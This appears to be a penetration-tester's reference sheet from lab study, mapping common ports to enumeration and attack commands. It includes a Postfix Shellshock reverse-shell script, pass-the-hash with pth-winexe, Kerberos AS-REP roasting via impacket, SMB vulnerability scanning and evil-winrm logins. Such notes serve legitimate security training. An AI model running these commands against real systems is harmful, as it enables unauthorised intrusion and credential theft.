COMMON PORTS AND USES
PORTS / ASSOCIATED COMMANDS / TARGET PROTOCOL
Port | Commands | Target |
---|---|---|
21 | FTP | |
Try anonymous logins ftp [email protected] | ||
25 | SMTP | |
telnet 10.10.10.10 25 VRFY user FINISH SESSION: Ctl + ] / close VULN SHELLSHOCK – need valid email addres: python2 postfix-shellshock-nc.py 10.10.10.10 [email protected] LHOST LPORT | ||
110 | POP | |
143 | IMAP | |
587 | SECURE EMAIL | |
80 / 443 | WEB | |
Dirb / Dirbuster / Gobuster / Nikto / Curl RFI / LFI / SQLI | ||
88 / 464 | KERBEROS | |
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe | ||
111 | NFS | |
showmount -a / -e | ||
135 | RPC | |
impacket-rpcdump | ||
139 / 445 | SMB | |
nmap --script nbstat.nse <ip> nmap --script smb-os-discovery <ip> nmap --script smb-enum-shares -p139,445 <ip> nmap --script smb-vuln* <ip> 'net' command on kali crackmapexec smb -u -p rpcclient -U '' -N impacket-lookupsid enum4linux VERSIONS FOR ANALYSIS: CIFS (OLD WIND NT 4.0) SMB 1.0 / SMB1 – WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2 SMB 2.0 / SMB2 – WIN VISTA / WIN SRV 2008 SMB 2.1 / SMB2.1 – WIN 7 / WIN SRV 2008 R2 SMB 3.0 / SMB3 – WIN 8 / WIN SRV 2012 SMB 3.02 / SMB3 – WIN 8.1 / WIN SRV 2012 R2 SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) – WIN SRV 2016 / WIN 10 | ||
1443 | MSSQL | |
nmap --script ms-sql* -p1433 sqsh -S 10.11.1.31 -U sa | ||
3306 | MYSQL | |
mysql -u <user> -p <pass> show databases; show tables; | ||
389 / 3268 | LDAP | |
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse nmap -p 389 --script ldap-search <ip> dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220 impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request | ||
3389 | RDP | |
rdesktop -u <user> -p <pass> <host> | ||
5985 / 5986 | WINRM | |
evil-winrm -u <user> -p <pass> -i <host> | ||
BACK TO HOME | REFERENCE PAGE |